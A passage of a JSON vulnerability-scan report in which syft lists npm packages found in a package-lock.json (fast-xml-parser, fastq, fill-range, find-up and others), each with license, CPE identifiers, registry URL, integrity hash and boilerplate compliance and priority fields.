"Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c31f574684b9f10b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: fast-xml-builder 1.1.5", "title": "fast-xml-builder 1.1.5", "description": "Package discovered: fast-xml-builder 1.1.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b198a6d2f9894f68", "name": "fast-xml-builder", "version": "1.1.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:fast-xml-builder:fast-xml-builder:1.1.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast-xml-builder:fast_xml_builder:1.1.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_xml_builder:fast-xml-builder:1.1.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_xml_builder:fast_xml_builder:1.1.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast-xml:fast-xml-builder:1.1.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast-xml:fast_xml_builder:1.1.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_xml:fast-xml-builder:1.1.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_xml:fast_xml_builder:1.1.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast:fast-xml-builder:1.1.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast:fast_xml_builder:1.1.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/fast-xml-builder@1.1.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.5.tgz", "integrity": "sha512-4TJn/8FKLeslLAH3dnohXqE3QSoxkhvaMzepOIZytwJXZO69Bfz0HBdDHzOTOon6G59Zrk6VQ2bEiv1t61rfkA==", "dependencies": { "path-expression-matcher": "^1.1.3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b4dd20a63e4dfb25", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: fast-xml-parser 5.7.2", "title": "fast-xml-parser 5.7.2", "description": "Package discovered: fast-xml-parser 5.7.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "03ef00f42507be2f", "name": "fast-xml-parser", "version": "5.7.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:naturalintelligence:fast-xml-parser:5.7.2:*:*:*:*:*:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/fast-xml-parser@5.7.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.7.2.tgz", "integrity": "sha512-P7oW7tLbYnhOLQk/Gv7cZgzgMPP/XN03K02/Jy6Y/NHzyIAIpxuZIM/YqAkfiXFPxA2CTm7NtCijK9EDu09u2w==", "dependencies": { "@nodable/entities": "^2.1.0", "fast-xml-builder": "^1.1.5", "path-expression-matcher": "^1.5.0", "strnum": "^2.2.3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0cdc7a6cc314eb50", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: fastq 1.20.1", "title": "fastq 1.20.1", "description": "Package discovered: fastq 1.20.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "32597e8bd5ad1e0f", "name": "fastq", "version": "1.20.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:fastq:fastq:1.20.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/fastq@1.20.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/fastq/-/fastq-1.20.1.tgz", "integrity": "sha512-GGToxJ/w1x32s/D2EKND7kTil4n8OVk/9mycTc4VDza13lOvpUZTGX3mFSCtV9ksdGBVzvsyAVLM6mHFThxXxw==", "dependencies": { "reusify": "^1.0.4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "98eadb7c6959fda9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: faye-websocket 0.11.4", "title": "faye-websocket 0.11.4", "description": "Package discovered: faye-websocket 0.11.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "5a9d4671ef023c43", "name": "faye-websocket", "version": "0.11.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:faye-websocket:faye-websocket:0.11.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:faye-websocket:faye_websocket:0.11.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:faye_websocket:faye-websocket:0.11.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:faye_websocket:faye_websocket:0.11.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:faye:faye-websocket:0.11.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:faye:faye_websocket:0.11.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/faye-websocket@0.11.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/faye-websocket/-/faye-websocket-0.11.4.tgz", "integrity": "sha512-CzbClwlXAuiRQAlUyfqPgvPoNKTckTPGfwZV4ZdAhVcP2lh9KUxJg2b5GkE7XbjKQ3YJnQ9z6D9ntLAlB+tP8g==", "dependencies": { "websocket-driver": ">=0.5.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "64d0cebc4ed83cee", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: fdir 6.5.0", "title": "fdir 6.5.0", "description": "Package discovered: fdir 6.5.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4d9064c107e69a4e", "name": "fdir", "version": "6.5.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:fdir:fdir:6.5.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/fdir@6.5.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz", "integrity": "sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7b56dfc5637424f2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: fflate 0.8.2", "title": "fflate 0.8.2", "description": "Package discovered: fflate 0.8.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ad8b63b86fd3ee37", "name": "fflate", "version": "0.8.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:fflate:fflate:0.8.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/fflate@0.8.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/fflate/-/fflate-0.8.2.tgz", "integrity": "sha512-cPJU47OaAoCbg0pBvzsgpTPhmhqI5eJjh/JIu8tPj5q+T7iLvW/JAYUqmE7KOB4R1ZyEhzBaIQpQpardBF5z8A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d2d1a258c47b4e8a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: fill-range 7.1.1", "title": "fill-range 7.1.1", "description": "Package discovered: fill-range 7.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "adf22420cd3811ab", "name": "fill-range", "version": "7.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:fill-range:fill-range:7.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fill-range:fill_range:7.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fill_range:fill-range:7.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fill_range:fill_range:7.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fill:fill-range:7.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fill:fill_range:7.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/fill-range@7.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", "dependencies": { "to-regex-range": "^5.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0d132a7f95881c19", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: finalhandler 1.3.2", "title": "finalhandler 1.3.2", "description": "Package discovered: finalhandler 1.3.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "257d2278606af57b", "name": "finalhandler", "version": "1.3.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:finalhandler:finalhandler:1.3.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/finalhandler@1.3.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/finalhandler/-/finalhandler-1.3.2.tgz", "integrity": "sha512-aA4RyPcd3badbdABGDuTXCMTtOneUCAYH/gxoYRTZlIJdF0YPWuGqiAsIrhNnnqdXGswYk6dGujem4w80UJFhg==", "dependencies": { "debug": "2.6.9", "encodeurl": "~2.0.0", "escape-html": "~1.0.3", "on-finished": "~2.4.1", "parseurl": "~1.3.3", "statuses": "~2.0.2", "unpipe": "~1.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a37c455231ce6925", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: find-up 4.1.0", "title": "find-up 4.1.0", "description": "Package discovered: find-up 4.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "dde504db4cea8c91", "name": "find-up", "version": "4.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:find-up:find-up:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:find-up:find_up:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:find_up:find-up:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:find_up:find_up:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:find:find-up:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:find:find_up:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/find-up@4.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", "dependencies": { "locate-path": "^5.0.0", "path-exists": "^4.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { 